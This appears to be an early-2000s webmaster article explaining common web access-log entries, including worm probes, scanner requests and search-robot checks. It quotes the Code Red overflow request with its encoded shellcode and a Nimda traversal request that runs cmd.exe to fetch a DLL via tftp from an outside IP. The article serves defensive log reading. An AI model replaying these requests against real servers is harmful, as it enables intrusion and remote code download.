If you have any entries that you would like added to this article, let us know in
this thread in our message boards
The goal of this page is to provide a list of entries that appear in Web Access-Logs and give an explanation of what these entries mean. I intend to update this list fairly frequently, and if any of you out there have any items you'd like to contribute, please pass them along to me here.
The Web Access-Log is a resource to use if you want up-to-the-minute data on what types of requests your web server is receiving. The data itself might look a little raw, but once you familiarize yourself with it, it can be useful in spotting unwanted requests by computers infected with viruses, worms and trojans. The log is usually kept in a file named access-log (no file extension) in your root ("www") directory. The following is a list of lines you may find cropping up in your logs:
Code Red:
GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNN NNNNNNNNNN NNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNN NNNNNNNNNN NNNNNNNNNNNNNNNN NNNNNNNNNNNNNN NNN%u9090% u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b %u53ff%u0078%u0000%u00=a HTTP/1.0" 400 252 yoursitename.com "-" "-" "-"
This entry is the result of a request by a system that has been compromised by Code Red, and is an attempt to infect your server with a copy of itself. It only affects Microsoft/IIS Servers that have not been patched and unpatched Cisco 600-series DSL routers. You can download the IIS Patch here.
The "Code Red" worm attempts to connect to TCP port 80 on a randomly chosen host assuming that a web server will be found. Upon a successful connection to port 80, the attacking host sends a crafted HTTP GET request to the victim, attempting to exploit a buffer overflow in the Indexing Service described in this advisory.
Nimda:
GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%2066.176.147.146%20GET%20cool.dll%20e:\\httpodbc.dll HTTP/1.0 404 1962 yoursitename.com "-" "-" "-"
GET /scripts/..%c0%af../httpodbc.dll HTTP/1.0" 404 1962 armbrustconsulting.com "-" "-" "-"
Usually, you'll see a series of entries like these in your access-log. You'll get several similar requests from the same IP. It is coming from a system that has been infected by Nimda (a.k.a. "W32/Nimda worm" or the "Concept Virus (CV) v.5.").
The Nimda worm has the potential to affect both user workstations (clients) running Windows 95, 98, ME, NT, or 2000 and servers running Windows NT and 2000. This worm propagates through email arriving as a MIME "multipart/alternative" message consisting of two sections. The first section is defined as MIME type "text/html", but it contains no text, so the email appears to have no content. The second section is defined as MIME type "audio/x-wav", but it contains a base64-encoded attachment named "readme.exe", which is a binary executable.
GET /sumthin
GET /sumthin HTTP/1.0" 404 1962 yoursitename.com "-" "-" "-"
This line started popping up in many access logs over the summer, and increased activity was reported in October. I'm assuming that this is generated by an automated scanner of some sort, but I haven't actually been able to confirm whether this is being done by a program or manually by specific individuals.
Regardless, this is an information gathering technique. The "/sumthin" is used to intentionally trigger a 404 error. If you haven't modified your 404 page (you can find instructions to do so here), or if a hacker telnets to your HTTP port and sends this GET request, this will reveal information about your Web Server type, Version and OS. If you are running an Apache server, add these lines to your httpd.conf file to prevent the server from disclosing this information:
ServerTokens ProductOnly
# Optionally add a line containing the server version and virtual host
# name to server-generated pages (error documents, FTP directory listings,
# mod_status and mod_info output etc., but not CGI generated documents).
# Set to "EMail" to also include a mailto: link to the ServerAdmin.
# Set to one of: On | Off | EMail
ServerSignature Off
Blank HEAD Requests
"HEAD / HTTP/1.0" 200 0 armbrustconsulting.com "-" "-" "-"
This entry is typically created by Scooter (the AltaVista robot that searches the web) or a similar robot named CheckUrl. When an empty request like this is made (the "0" after the "200" in the above line shows that no HTML was sent by the server) the server only returns information such as wheter the page exists, the date modified, etc. No HTML, metadata or any other type of page content is returned. Meta data is not returned on HEAD, only GET requests. Typically, a search robot makes requests like this a few days before it does a full search on your site, to make sure that the pages from your website that it already has indexed still exist, and whether it needs to update these pages.
netcraft.com entries:
HEAD /cobalt-images/welcome2.gif HTTP/1.0 404 1962 yoursitename.com "-"
This entry often raises a lot of red flags when its found in access logs, but it is actually fairly harmless. It looks suspicious if you are not running a cobalt server, because Unix and Microsoft servers don't have a folder or image that matches up with the request. What is happening here is that a user on netcraft.com has been doing a search on your site name. One of the things that netcraft does is check to see what type of server your site is being hosted on -- this log entry is a check to see if you're running cobalt. (Of course, the fact that someone out there is making an effort to find out the specifics of your server software perhaps should raise a warning flag, but this entry in and of itself is harmless)
nsiislog.dll entries
(thanks to Noam Eppel -- noameppel.com)
192.168.0.1 - - [] "GET /scripts/nsiislog.dll" 404 653 "-" "-"
This is caused by an attempt to exploit Microsoft's Windows Media Services (no effect on Apache systems).
There is a flaw in the way in which nsiislog.dll, an ISAPI extension used to log data sent through
Windows Media Services, processes incoming requests. A vulnerability exists because an attacker could send specially formed communications to the server that could cause IIS to fail or execute code on the user's system.
If you are running a Windows NT-based server,
download the patch!
Related Links: Using your Web Access-Log
Want to discuss this article, or other development issues? Visit our
message boards!
Or contact us directly with a comment or question on this article: click here !
|